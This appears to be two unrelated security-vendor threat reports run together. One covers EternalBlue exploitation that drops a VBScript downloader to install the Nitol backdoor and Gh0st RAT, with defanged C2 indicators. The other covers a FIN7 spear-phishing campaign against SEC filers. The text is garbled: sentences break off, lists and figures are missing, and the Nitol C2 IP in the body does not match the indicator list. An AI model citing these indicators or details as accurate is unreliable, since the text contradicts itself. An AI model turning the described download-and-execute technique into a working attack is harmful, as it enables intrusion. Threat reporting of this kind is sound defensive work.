The “EternalBlue” exploit (MS017-010)
was initially used by WannaCry ransomware and Adylkuzz cryptocurrency
miner. Now more threat actors are leveraging the vulnerability in Microsoft
Server Message Block (SMB) protocol – this time to distribute
Backdoor.Nitol and Trojan Gh0st RAT.
FireEye Dynamic Threat Intelligence (DTI) has historically observed
similar payloads delivered via exploitation of CVE-2014-6332
vulnerability as well as in some email spam campaigns using powershell
commands. Specifically, Backdoor.Nitol has also been linked to
campaigns involving a remote code execution vulnerability using the
ADODB.Stream ActiveX Object that affects older versions of Internet
Explorer. Both payloads have previously been involved in targeted cyber-attacks
against the aerospace and defense industry.
We observed lab machines vulnerable to SMB exploit were attacked by
a threat actor using the EternalBlue exploit to gain shell access to
Figure 1 shows an EternalBlue exploitation attempt.
Figure 1. Network traffic showing EternalBlue
The initial exploit technique used at the SMB
level is similar to what we have been seen in WannaCry
campaigns; however, once a machine is successfully infected, this
particular attack opens a shell to write instructions into a VBScript
file and then executes it to fetch the payload on another server.
We have observed the same EternalBlue and VBScript combination used
to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being
delivered in the South Asia region.
Figure 2. VBScript instructions in ‘1.vbs’
The full VBScript instructions can be seen in Figure 2. The attacker
echoes instructions into a new ‘1.vbs’ file to be executed later.
These instructions fetch the payload ‘taskmgr.exe’ from another
server in a synchronous call (as indicated by the second parameter
‘0’). This action creates an ActiveX object ADODB.Stream, which
allows reading the file coming from the server and writes the result
of the binary data in a stream. Mode ‘3’ is used for read/write
permissions while type ‘1’ indicates stream as binary data.
Thereafter, it saves the binary stream to a location at “c:/” with
option ‘2’ in order to overwrite any binary with the same name at that location.
Later, we see that ‘1.vbs’ executes through a command-line version
of the Windows Script Host which deletes the vbs file. Once the
executable is fetched and saved, the attacker uses a shell to launch
the backdoor from the saved location.
Figure 3 shows Backdoor.Nitol being downloaded and infecting the machine.
Figure 3. Network traffic showing Backdoor.Nitol download
The command and control (C2) for the Backdoor.Nitol sample is
hackqz.f3322[.]org (184.108.40.206). See Figure 4.
Figure 4. Backdoor.Nitol C2 communication
The other malware that we’ve observed being deployed in this manner
is Gh0st RAT. The observed dropper downloads the Gh0st RAT binary from
beiyeye.401hk[.]com (Figure 5).
Figure 5. Gh0st RAT C2 communication
The first five bytes in the header of the Gh0st RAT traffic is an
indication of the Gh0st variant used. Historically we have seen
wide-spread usage of variants employing the ‘cb1st’ magic
header against the Education, Energy/Utilities, Manufacturing,
Services/Consulting, and Telecom industries. For more information on
this and other widely used variants of Gh0st RAT, please review GH0ST
in the Machine: GH0ST RAT Remains Active in Financial Services
Sector available on our subscription MySight portal.
The Gh0St RAT sample observed in this attack, as well as other
associated samples identified by FireEye are all signed with a common
digital certificate purporting to be from 北京研创达科技有限公司 (Beijing
Institute of Science and Technology Co., Ltd). Stolen or
illegitimately purchased code signing certificates are increasingly
used to lend legitimacy to malware. See the appendix for full details
on the observed code signing certificate.
The addition of the EternalBlue exploit to Metasploit has made it
easy for threat actors to exploit these vulnerabilities. In the coming
weeks and months, we expect to see more attackers leveraging these
vulnerabilities and to spread such infections with different payloads.
It is critical that Microsoft Windowsusers patch their machines and
update to the latest software versions as soon as possible.
FireEye Labs authors would like to thank Shahzad Ahmad and Kean
Siong Tan for their contributions in this discovery.
220.127.116.11:45988 / taskmgr.exe (Nitol)
beiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)
In late February 2017, FireEye as a Service (FaaS) identified a spear
phishing campaign that appeared to be targeting personnel involved
with United States Securities and Exchange Commission (SEC) filings at
various organizations. Based on multiple identified overlaps in
infrastructure and the use of similar tools, tactics, and procedures
(TTPs), we have high confidence that this campaign is associated with
the financially motivated threat group tracked by FireEye as FIN7.
FIN7 is a financially motivated intrusion set that selectively
targets victims and uses spear phishing to distribute its malware. We
have observed FIN7 attempt to compromise diverse organizations for
malicious operations – usually involving the deployment of
point-of-sale malware – primarily against the retail and hospitality industries.
All of the observed intended recipients of the spear phishing
campaign appeared to be involved with SEC filings for their respective
organizations. Many of the recipients were even listed in their
company’s SEC filings. The sender email address was spoofed as EDGAR
<firstname.lastname@example.org> and the attachment was named
d04b6410dddee19adec75f597c52e386). An example email is shown in
Figure 1: Example of a phishing email sent
during this campaign
We have observed the following TTPs with this campaign:
Thus far, we have directly identified 11 targeted organizations in
the following sectors:
All these organizations are based in the United States, and many
have international presences. As the SEC is a U.S. regulatory
organization, we would expect recipients of these spear phishing
attempts to either work for U.S.-based organizations or be U.S.-based
representatives of organizations located elsewhere. However, it is
possible that the attackers could perform similar activity mimicking
other regulatory organizations in other countries.
We have not yet identified FIN7’s ultimate goal in this campaign, as
we have either blocked the delivery of the malicious emails or our
FaaS team detected and contained the attack early enough in the
lifecycle before we observed any data targeting or theft. However, we
surmise FIN7 can profit from compromised organizations in several
ways. If the attackers are attempting to compromise persons involved
in SEC filings due to their information access, they may ultimately be
pursuing securities fraud or other investment abuse. Alternatively, if
they are tailoring their social engineering to these individuals, but
have other goals once they have established a foothold, they may
intend to pursue one of many other fraud types.
Previous FIN7 operations deployed multiple point-of-sale malware
families for the purpose of collecting and exfiltrating sensitive
financial data. The use of the CARBANAK malware in FIN7 operations
also provides limited evidence that these campaigns are linked to
previously observed CARBANAK operations leading to fraudulent banking
transactions, ATM compromise, and other monetization schemes.
FireEye implemented a Community Protection Event – FaaS, Mandiant,
Intelligence, and Products – to secure all clients affected by this
campaign. In this instance, an incident detected by FaaS led to the
deployment of additional detections by the FireEye Labs team after
FireEye Labs Advanced Reverse Engineering quickly analyzed the
malware. Detections were then quickly deployed to the suite of FireEye products.
The FireEye iSIGHT Intelligence MySIGHT Portal contains additional
information based on our investigations of a variety of topics
discussed in this post, including FIN7 and the POWERSOURCE and
TEXTMATE malware. Click here for